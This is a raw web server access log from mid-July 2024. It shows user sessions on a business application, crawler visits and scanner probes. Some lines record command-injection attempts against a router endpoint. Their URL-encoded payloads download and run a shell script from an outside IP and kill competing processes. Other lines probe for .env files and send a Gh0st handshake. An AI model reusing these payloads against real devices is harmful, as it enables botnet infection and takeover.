178.165.188.60 - - [16/Jul/2024:17:53:35 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10339856&value=17720314&ser=1721140289979 HTTP/1.1" 200 257 "http://hausegger.activities.at/entry.php?id=10830&&object=10339856&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:37 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1899 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:37 +0200] "GET /gui/javascript/form_form.js?1721145217 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:37 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1670 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:38 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1803 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:38 +0200] "GET /gui/javascript/form_form.js?1721145218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:40 +0200] "GET /entry.php?id=11270&document=10339856 HTTP/1.1" 200 1974 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:40 +0200] "GET /gui/javascript/form_bu_document.js?1721145220 HTTP/1.1" 200 2675 "http://hausegger.activities.at/entry.php?id=11270&document=10339856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:40 +0200] "GET /gui/javascript/form_form.js?1721145220 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11270&document=10339856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:40 +0200] "GET /entry.php?id=11241&images=false&document=10339856 HTTP/1.1" 200 2256 "http://hausegger.activities.at/entry.php?id=11270&document=10339856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:40 +0200] "GET /entry.php?id=10877&mode=observePrint HTTP/1.1" 200 58 "http://hausegger.activities.at/entry.php?id=11270&document=10339856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:53:40 +0200] "GET /binaries/10222042.jpg HTTP/1.1" 200 13888 "http://hausegger.activities.at/entry.php?id=11241&images=false&document=10339856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:25 +0200] "GET /entry.php?id=10828 HTTP/1.1" 200 9143 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:25 +0200] "GET /gui/javascript/form_form.js?1721145385 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:25 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:39 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1878 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:40 +0200] "GET /gui/javascript/form_form.js?1721145399 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:41 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2434 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:41 +0200] "GET /gui/javascript/form_form.js?1721145401 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:41 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1910 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [16/Jul/2024:17:56:41 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 907 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
172.206.143.231 - - [16/Jul/2024:18:02:54 +0200] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
91.92.241.222 - - [16/Jul/2024:18:25:15 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"
205.210.31.38 - - [16/Jul/2024:18:37:35 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
35.84.39.54 - - [16/Jul/2024:18:39:45 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)"
35.84.39.54 - - [16/Jul/2024:18:39:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)"
45.148.10.202 - - [16/Jul/2024:19:01:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
45.148.10.202 - - [16/Jul/2024:19:01:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
92.249.48.202 - - [16/Jul/2024:19:10:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.143.26 - - [16/Jul/2024:19:56:46 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
72.5.43.109 - - [16/Jul/2024:20:08:57 +0200] "GET /wp-content/plugins/wp-catcher/index.php HTTP/1.1" 404 315 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.240.205.34 - - [16/Jul/2024:21:30:13 +0200] "Gh0st\xad" 400 383 "-" "-"
46.19.143.26 - - [16/Jul/2024:21:42:05 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World"
45.156.129.46 - - [16/Jul/2024:21:57:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.46 - - [16/Jul/2024:21:57:02 +0200] "GET /aspera/faspex/ HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
87.121.69.24 - - [16/Jul/2024:22:21:36 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
222.216.206.99 - - [16/Jul/2024:23:00:56 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
141.98.11.189 - - [16/Jul/2024:23:05:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
45.142.182.78 - - [16/Jul/2024:23:11:43 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
45.148.10.202 - - [16/Jul/2024:23:17:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
159.223.158.180 - - [16/Jul/2024:23:42:38 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
159.223.158.180 - - [16/Jul/2024:23:42:38 +0200] "GET /security.txt HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
141.98.11.189 - - [17/Jul/2024:00:03:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
110.44.113.24 - - [17/Jul/2024:00:16:25 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
5.236.26.224 - - [17/Jul/2024:00:27:25 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.148.10.202 - - [17/Jul/2024:00:43:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
45.148.10.202 - - [17/Jul/2024:00:43:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
92.249.48.202 - - [17/Jul/2024:00:45:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.128.38.127 - - [17/Jul/2024:00:56:54 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.32.103.64 - - [17/Jul/2024:00:57:15 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.8960.1990 Mobile Safari/537.36"
47.128.126.240 - - [17/Jul/2024:00:57:36 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
143.198.215.68 - - [17/Jul/2024:00:57:59 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.9209.1086 Mobile Safari/537.36"
185.191.126.213 - - [17/Jul/2024:00:59:06 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
65.181.111.156 - - [17/Jul/2024:01:02:36 +0200] "GET /modules/simpleimportproduct/views/js/error.js HTTP/1.1" 404 405 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36"
185.191.126.213 - - [17/Jul/2024:01:18:44 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
36.99.136.128 - - [17/Jul/2024:01:22:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.137 - - [17/Jul/2024:01:22:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:58 +0200] "GET /layout.php HTTP/1.1" 200 816 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:22:58 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:22:59 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:22:59 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1900 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:59 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1758 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:22:59 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1158 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:22:59 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:59 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:59 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:59 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:59 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:22:59 +0200] "GET /gui/javascript/form_form.js?1721172179 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:00 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:00 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:00 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:23:00 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:00 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:00 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:23:01 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2383 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:23:01 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 932 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:01 +0200] "GET /gui/javascript/form_form.js?1721172181 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.128 - - [17/Jul/2024:01:23:02 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1900 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.136 - - [17/Jul/2024:01:23:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:23:02 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:23:02 +0200] "GET /gui/javascript/form_form.js?1721172182 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10273&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.5720.0 Safari/537.36"
36.99.136.129 - - [17/Jul/2024:01:23:55 +0200] "-" 408 - "-" "-"
111.7.100.28 - - [17/Jul/2024:01:25:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
111.7.100.29 - - [17/Jul/2024:01:25:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
111.7.100.28 - - [17/Jul/2024:01:25:36 +0200] "GET /layout.php HTTP/1.1" 200 817 "http://zafi.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.28 - - [17/Jul/2024:01:25:36 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.29 - - [17/Jul/2024:01:25:37 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1901 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.28 - - [17/Jul/2024:01:25:37 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.30 - - [17/Jul/2024:01:25:37 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.30 - - [17/Jul/2024:01:25:37 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1158 "http://zafi.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.31 - - [17/Jul/2024:01:25:37 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.30 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.31 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.28 - - [17/Jul/2024:01:25:38 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.31 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://zafi.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.28 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/javascript/form_form.js?1721172337 HTTP/1.1" 200 16206 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.31 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.31 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.29 - - [17/Jul/2024:01:25:38 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.29 - - [17/Jul/2024:01:25:38 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
111.7.100.31 - - [17/Jul/2024:01:25:38 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://zafi.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.199 Safari/537.36"
